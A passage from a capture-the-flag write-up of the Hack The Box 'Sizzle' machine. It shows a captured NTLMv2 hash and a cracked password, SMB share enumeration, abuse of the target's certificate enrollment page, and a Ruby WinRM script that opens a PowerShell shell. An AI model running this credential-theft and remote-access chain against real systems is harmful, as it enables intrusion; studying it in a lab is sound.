[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.10.103
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash : amanda::HTB:aa3b1bcd824893e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
Cracked her password with hashcat
Amanda:Ashare1972
➜ Sizzle smbmap -u amanda -p 'Ashare1972' -H 10.10.10.103
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.10.103:445 Name: sizzle Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Operations NO ACCESS
SYSVOL READ ONLY Logon server share
The password works
Evil-WinRM does not let me log in with the password; the WinRM listener (HTTPS on 5986) most likely requires certificate authentication. We'll create a key and a signing request with OpenSSL and have the web enrollment server sign it for us.
Creating a key
➜ Sizzle openssl genrsa -aes256 -out amanda.key 2048
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
Creating a certificate signing request (CSR)
➜ Sizzle openssl req -new -key amanda.key -out amanda.csr
Enter pass phrase for amanda.key:
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
➜ Sizzle cat amanda.csr
-----BEGIN CERTIFICATE REQUEST-----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-----END CERTIFICATE REQUEST-----
The web server's certificate enrollment page will sign it for us: http://10.10.10.103/certsrv/certrqxt.asp
Paste the CSR (the contents of amanda.csr) and hit Submit.
Download the certificate:
mv ~/Downloads/certnew.cer amanda.cer
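As an added example (not part of the original writeup): the same key-and-CSR flow done in Ruby, plus the checks worth running on the downloaded certificate before pointing WinRM at it. The CA here is a constructed stand-in, because the real signing step happens in the browser against the enrollment page; the passphrase and common name are assumptions.

```ruby
require 'openssl'

# Programmatic equivalent of the two openssl commands above: an RSA key,
# exported AES-256 encrypted under a passphrase (like amanda.key), and a
# CSR carrying only a CN (like the one pasted into certrqxt.asp).
def make_key_and_csr(common_name, passphrase, bits: 2048)
  key = OpenSSL::PKey::RSA.new(bits)
  req = OpenSSL::X509::Request.new
  req.version = 0
  req.subject = OpenSSL::X509::Name.parse("/CN=#{common_name}")
  req.public_key = key.public_key
  req.sign(key, OpenSSL::Digest.new('SHA256'))
  key_pem = key.export(OpenSSL::Cipher.new('aes-256-cbc'), passphrase)
  [key_pem, req.to_pem]
end

# Constructed stand-in for the web enrollment CA so the checks below run
# offline. It is NOT the real CA; it signs whatever CSR it is handed.
def toy_ca_sign(csr_pem, ca_key, ca_name, days: 365)
  req = OpenSSL::X509::Request.new(csr_pem)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = 1
  cert.subject = req.subject
  cert.issuer = OpenSSL::X509::Name.parse(ca_name)
  cert.public_key = req.public_key
  cert.not_before = Time.now - 60
  cert.not_after = cert.not_before + days * 86_400
  cert.sign(ca_key, OpenSSL::Digest.new('SHA256'))
  cert.to_pem
end

# Pre-flight checks before handing certnew.cer / amanda.key to WinRM:
# the passphrase opens the key, the CSR's own signature verifies, the
# returned certificate carries our public key, and it is valid right now.
# Returns named results instead of raising, so a failing step is easy
# to report.
def preflight(key_pem, passphrase, csr_pem, cert_pem, now: Time.now)
  key  = OpenSSL::PKey::RSA.new(key_pem, passphrase)
  req  = OpenSSL::X509::Request.new(csr_pem)
  cert = OpenSSL::X509::Certificate.new(cert_pem)
  {
    csr_signature_ok: req.verify(req.public_key),
    key_matches_cert: cert.public_key.to_der == key.public_key.to_der,
    cert_in_validity: cert.not_before <= now && now <= cert.not_after,
    subject_cn: cert.subject.to_a.assoc('CN')&.fetch(1)
  }
end
```

A certificate that was issued for some other key (for example a CSR regenerated after the first submission) fails the key_matches_cert check, which is the usual reason a WinRM certificate login is rejected even though the certificate itself looks fine.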
A script that 0xdf used to sign in to the target using certificates (originally written by Alamot):
https://raw.githubusercontent.com/Alamot/code-snippets/master/winrm/winrm_shell.rb
psRemote.rb
require 'winrm'
# Author: Alamot

# WinRM over HTTPS (5986) with certificate authentication: the client
# certificate issued by the CA plus the private key the CSR was made with.
# Peer verification is disabled because the CA is not trusted locally.
conn = WinRM::Connection.new(
  endpoint: 'https://10.10.10.103:5986/wsman',
  transport: :ssl,
  client_cert: 'amanda.cer',
  client_key: 'amanda.key',
  no_ssl_peer_verification: true
)

command = ''
conn.shell(:powershell) do |shell|
  until command == "exit\n"
    # Build a "PS user@HOST dir> " prompt on the remote side
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    # gets returns nil on EOF (Ctrl-D); treat that as "exit"
    command = gets || "exit\n"
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
➜ Sizzle ruby psRemote.rb
Enter PEM pass phrase:
PS htb\amanda@SIZZLE Documents> whoami
Enter PEM pass phrase:
htb\amanda
PS htb\amanda@SIZZLE Documents> whoami
htb\amanda
PS htb\amanda@SIZZLE Documents>